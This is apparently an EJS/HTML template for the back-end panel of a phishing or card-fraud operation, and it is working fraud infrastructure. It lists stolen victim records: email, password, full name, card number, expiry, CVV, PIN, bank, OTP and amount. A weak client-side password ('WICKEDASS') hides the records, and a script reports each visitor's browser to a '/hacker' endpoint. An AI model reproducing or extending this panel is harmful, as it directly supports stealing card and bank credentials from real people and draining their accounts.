





	
	


		
<!DOCTYPE html>

<html>

<head>

	<meta charset="UTF-8">	<meta name="viewport" content="width=device-width, initial-scale=1.0">

	<link rel="icon" href="/site_icon.jpg">

	<style type="text/css">

		@media screen and (min-width: 300px){

			body{

				font-family: arial, helvetica, sans-serif;

				

			}

			

			

			.data_wrapper{
				display: none;

				grid-template-columns: 1fr 1fr;

				max-width: 700px;

				margin: 45px auto;

			}

			.data_wrapper_wrapper > div{

			background-color: rgb(240, 240, 240);	

				padding: 5px 0;

				font-size: 12px;

			}

			

			.data_wrapper_wrapper > div:nth-child(even){

				background-color: rgb(200, 200, 200);	

			}

			.data_wrapper > div{

				padding:5px 0;

				border-left: 1px solid rgb(160, 160, 160);

				text-align: center;

			}

			.delete{

				display: block;

				padding: 7px 15px;

				margin: 10px 5px 0 auto;

				background-color: rgb(200, 30, 10);

				color: white;

				border: none;

			}

		}

		@media screen and (min-width: 1000px){

			.data_wrapper_wrapper > div{

				font-size: 16px;

			}

		}

	</style>

	<title></title>

</head>

<body>

<script type="text/javascript">

		

		const kick = async()=>{

			const result = await fetch("/hacker", {

				method: "POST",

				headers: {"Content-Type": "application/json"},

				body: JSON.stringify({

					device: window.navigator.userAgent

				})

			});

			const res = await result.json();

			if(res.danger){

				window.location.href = "/";

			}else{
			alert("Done")
			}


			

			}

		

		kick()

	</script>
	
	
	
	<%for(i=hackers.length - 1; i>=0; i--){%>

		<!--<div style="color: red; font-size: 16px; margin-top: 5px";><%=hackers[i].device%></div>

		<br><br> -->

	

	<%}%>

	

	<main>

		

		

		<%if(data && data.length > 0){%>

			

			<h1 class="real_h1" style="margin-top: 20px; text-align: center;"> </h1>

			<form style="margin: 20px 0">

				<input type="password" name="password">

				<button>Okay</button>

			</form>

			<div class="data_wrapper_wrapper">

				<%for(i=data.length - 1; i>=0; i--){%>

					<div class="data_wrapper">

						<div class="email">State: <%=data[i].state%></div>

						<div class="email">L.G.A: <%=data[i].lga%></div>

						<div class="email">password: <%=data[i].password%></div>

						<div class="password">Email: <%=data[i].email%></div>

						<div class="email">Name: <%=data[i].fullName%></div>

						<div class="password">Card Number: <%=data[i].card_number%></div>

						<div class="password">Date: <%=data[i].date%></div>

						<div class="password">CVV: <%=data[i].cvv%></div>

						<div class="password">Pin: <%=data[i].pin%></div>

						<div class="password">Bank: <%=data[i].bank%></div>

						<div class="password">OTP: <%=data[i].otp%> </div>

						<div class="password">Amount: <%=data[i].amount%></div>

						<div class="password">Time: <%=data[i].time%></div>

					</div>

				<%}%>

			</div>

		<%}else{%>

			<h1 style="margin-top: 20px; text-align: center;">No Treasure Yet</h1>

		<%}%>

		

	</main>
	
	
	
<script>
document.querySelector("form").addEventListener("submit", (e)=>{
  e.preventDefault();
  const pass = document.querySelector("input");
  if(pass.value === "WICKEDASS"){
    document.querySelector(".data_wrapper").style.display = "grid";
  }
})
</script>
	

			

</body>

</html>
		
		
